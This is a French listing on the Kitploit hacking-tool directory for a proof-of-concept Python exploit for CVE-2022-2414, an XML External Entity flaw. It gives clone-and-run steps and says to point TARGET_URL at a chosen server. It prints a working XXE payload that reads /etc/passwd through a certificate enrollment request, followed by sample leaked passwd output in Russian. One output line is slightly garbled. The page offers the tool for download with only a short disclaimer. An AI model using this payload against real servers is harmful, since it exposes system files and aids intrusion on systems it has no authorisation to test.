Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-2414 — est un script PoC pour démontrer l'exploitation d'une vulnérabilité XML External Entity (XXE) | Kitploit
Outils/GitHubGitHub/geniuszly/cve-2022-2414
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubgeniuszly/cve-2022-2414

CVE-2022-2414

est un script PoC pour démontrer l'exploitation d'une vulnérabilité XML External Entity (XXE)

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

FR

GenXMLExternalEntityExploit est un script PoC pour démontrer l'exploitation d'une vulnérabilité XML External Entity (XXE). Le script utilise des charges utiles XML pour lire des fichiers sensibles sur un serveur cible. Cela peut être utile pour les tests de sécurité, les tests d'intrusion ou à des fins éducatives.

Fonctionnalités

  • Envoie une charge utile XML conçue à un serveur spécifié.
  • Exploite les vulnérabilités XXE pour lire des fichiers sur le serveur.
  • URL cible et données de charge utile facilement personnalisables.

Comment utiliser

  1. Clonez le dépôt
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2022-2414
    
  2. Rendez-vous dans le répertoire
    root@kitploit:~
    cd CVE-2022-2414
    
  3. Exécutez le script Assurez-vous que Python est installé sur votre machine.
    root@kitploit:~
    python3 GenXMLExternalEntityExploit.py
    

Configuration

  • TARGET_URL : Mettez à jour la variable TARGET_URL dans le script pour pointer vers le serveur cible que vous souhaitez tester.
  • XML_PAYLOAD : Personnalisez la chaîne XML_PAYLOAD dans le script pour des chemins de fichiers ou des opérations côté serveur spécifiques.
  • HEADERS : Modifiez les en-têtes HTTP si nécessaire.

Exemple

Par défaut, le script utilise la charge utile suivante pour lire le fichier /etc/passwd :

root@kitploit:~
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
  <Attributes/>
  <ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>

Exemple de sortie

root@kitploit:~
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...

Avertissement

Cet outil est destiné uniquement à des fins éducatives et aux tests de sécurité autorisés. L'auteur décline toute responsabilité en cas d'utilisation illégale de cet outil.

Télécharger l’outil